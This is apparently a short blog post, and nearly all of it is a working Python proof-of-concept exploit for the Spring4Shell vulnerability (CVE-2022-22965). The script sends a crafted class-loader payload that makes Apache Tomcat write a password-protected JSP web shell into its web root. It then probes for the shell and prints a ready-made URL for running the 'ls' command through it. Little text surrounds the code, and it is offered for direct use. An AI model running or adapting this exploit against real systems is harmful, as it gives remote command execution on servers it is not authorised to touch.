Poc_CVE-2022-22965

 

 1 import argparse
 2 import requests
 3 import time
 4 from urllib.parse import urljoin
 5 import urllib3
 6 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 7 
 8 def run(url):
 9     headers = {
10         "suffix": "%>//",
11         "c1": "Runtime",
12         "c2": "<%",
13         "DNT": "1",     #Do Not Track
14         "Content-Type": "application/x-www-form-urlencoded",
15     }
16     data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22w%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
17 
18     try:
19         requests.post(url=url,data=data,headers=headers,verify=False,allow_redirects=False,timeout=15)#verify=False(avoid ssl) allow_redirects=False(拒绝默认的301/302重定向)
20         time.sleep(10)
21         shellurl = urljoin(url,'tomcatwar.jsp')
22         shellexploit = requests.post(shellurl,allow_redirects=False,verify=False,stream=True,timeout=15)
23         print(shellexploit)
24         if shellexploit.status_code == 200:
25             print("It looks likely vulnerable"+" please copy and skip "+shellurl+"?pwd=w&cmd=ls")
26 
27     except Exception as e:
28             print(e)
29             pass
30 
31 if __name__ == '__main__':
32     parameter = argparse.ArgumentParser(description='Poc CVE-2022-22965:')
33     parameter.add_argument('--file',help='url file',required=False)
34     parameter.add_argument('--url',help='ip:port',required=False)
35     para = parameter.parse_args()
36 
37     if para.url:
38         run(para.url)
39         exit()
40     else:
41         parameter.print_help()

此poc借鉴了一下——https://github.com/BobTheShoplifter/Spring4Shell-POC

posted @ 2022-06-23 18:04  wavesky  阅读(331)  评论(0编辑  收藏  举报